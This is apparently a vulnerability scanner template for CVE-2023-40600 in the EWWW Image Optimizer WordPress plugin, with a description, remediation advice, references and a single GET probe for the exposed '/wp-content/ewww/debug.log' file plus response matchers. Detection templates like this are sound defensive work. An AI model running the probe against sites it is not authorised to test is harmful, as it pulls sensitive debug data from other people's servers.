id: CVE-2023-40600 info: name: EWWW Image Optimizer <= 7.2.0 - Unauthenticated Information Disclosure author: Shivam Kamboj severity: medium description: | The EWWW Image Optimizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.0 via the debug_log function. This makes it possible for unauthenticated attackers to extract sensitive debug data when debug logging is enabled. impact: Attackers can access sensitive embedded data, potentially leading to information disclosure and further exploitation. remediation: Remove debug information and update to the latest version of EWWW Image Optimizer. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-40600 - https://patchstack.com/database/wordpress/plugin/ewww-image-optimizer/vulnerability/wordpress-ewww-image-optimizer-plugin-7-2-0-sensitive-data-exposure-vulnerability - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer/ewww-image-optimizer-720-unauthenticated-sensitive-information-exposure-via-debug-log metadata: verified: true max-request: 1 tags: cve,cve2023,wp,wordpress,wp-plugin,ewww-image-optimizer,vkev http: - method: GET path: - "{{BaseURL}}/wp-content/ewww/debug.log" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "ewww_image_optimizer","__construct()")' condition: and # digest: 4a0a00473045022100f081fe88954782b22420244733720ec76bcc72f13270afb18b397dee6a651107022044105d9849b1cc36e727f665e911f62b0cb62e96c74e400c24eee8518e28f89e:922c64590222798bb761d5b6d8e72950